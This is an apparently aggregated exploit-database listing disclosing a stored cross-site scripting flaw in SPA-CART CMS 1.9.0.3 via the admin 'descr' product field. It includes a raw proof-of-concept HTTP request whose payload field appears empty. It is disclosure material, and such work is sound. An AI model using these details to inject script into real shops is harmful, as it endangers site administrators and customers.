Headline

SPA-CART CMS 1.9.0.3 Cross Site Scripting

SPA-CART CMS version 1.9.0.3 suffers from a persistent cross site scripting vulnerability.

9 months ago

Packet Storm

Open in Source

#xss #vulnerability #web #windows #apple #linux #php #auth #dell #chrome #webkit

Exploit Title: SPA-CART CMS - Stored XSS

Date: 2024-01-03

Exploit Author: Eren Sen

Vendor: SPA-Cart

Vendor Homepage: https://spa-cart.com/

Software Link: https://demo.spa-cart.com/

Version: [1.9.0.3]

CVE-ID: N/A

Tested on: Kali Linux / Windows 10

Vulnerabilities Discovered Date : 2024/01/03

Vulnerability Type: Stored Cross Site Scripting (XSS) Vulnerability

Vulnerable Parameter Type: POST

Vulnerable Parameter: descr

Proof of Concept: demo.spa-cart.com/product/258

HTTP Request:

POST ////admin/products/258 HTTP/2
Host: demo.spa-cart.com
Cookie: PHPSESSID=xxxxxxxxxxxxxxxxxx; remember=xxxxxxxxxxxxxxxx
Content-Length: 1906
Sec-Ch-Ua:
Accept: /
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUsO8JxBs6LhB8LSl
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36
Sec-Ch-Ua-Platform: “”
Origin: https://demo.spa-cart.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://demo.spa-cart.com////admin/products/258
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

------WebKitFormBoundaryUsO8JxBs6LhB8LSl
Content-Disposition: form-data; name="mode"

------WebKitFormBoundaryUsO8JxBs6LhB8LSl
Content-Disposition: form-data; name="sku"

SKU386

------WebKitFormBoundaryUsO8JxBs6LhB8LSl
Content-Disposition: form-data; name="name"

asdf

------WebKitFormBoundaryUsO8JxBs6LhB8LSl
Content-Disposition: form-data; name="cleanurl"

Wholesale-DIY-Jewelry-Faceted-70pcs-6-8mm-Red-AB-Rondelle-glass-Crystal-Beads
------WebKitFormBoundaryUsO8JxBs6LhB8LSl
Content-Disposition: form-data; name="avail"

1000

------WebKitFormBoundaryUsO8JxBs6LhB8LSl
Content-Disposition: form-data; name="price"

0.00

------WebKitFormBoundaryUsO8JxBs6LhB8LSl
Content-Disposition: form-data; name="list_price"

------WebKitFormBoundaryUsO8JxBs6LhB8LSl
Content-Disposition: form-data; name="weight"

0.00

------WebKitFormBoundaryUsO8JxBs6LhB8LSl
Content-Disposition: form-data; name="categoryid"

------WebKitFormBoundaryUsO8JxBs6LhB8LSl
Content-Disposition: form-data; name="categories[]"

------WebKitFormBoundaryUsO8JxBs6LhB8LSl
Content-Disposition: form-data; name="brandid"

------WebKitFormBoundaryUsO8JxBs6LhB8LSl
Content-Disposition: form-data; name="status"

------WebKitFormBoundaryUsO8JxBs6LhB8LSl
Content-Disposition: form-data; name="keywords"

------WebKitFormBoundaryUsO8JxBs6LhB8LSl

Content-Disposition: form-data; name="descr"

------WebKitFormBoundaryUsO8JxBs6LhB8LSl
Content-Disposition: form-data; name="title_tag"

------WebKitFormBoundaryUsO8JxBs6LhB8LSl
Content-Disposition: form-data; name="meta_keywords"

------WebKitFormBoundaryUsO8JxBs6LhB8LSl
Content-Disposition: form-data; name="meta_description"

------WebKitFormBoundaryUsO8JxBs6LhB8LSl–

Packet Storm: Latest News

Ivanti EPM Agent Portal Command Execution

17 hours ago

Packet Storm

Judge0 Sandbox Escape

17 hours ago

Packet Storm

Wireshark Analyzer 4.4.2

17 hours ago

Packet Storm

Falco 0.39.2

17 hours ago

Packet Storm

Ubuntu Security Notice USN-7118-1

18 hours ago

Packet Storm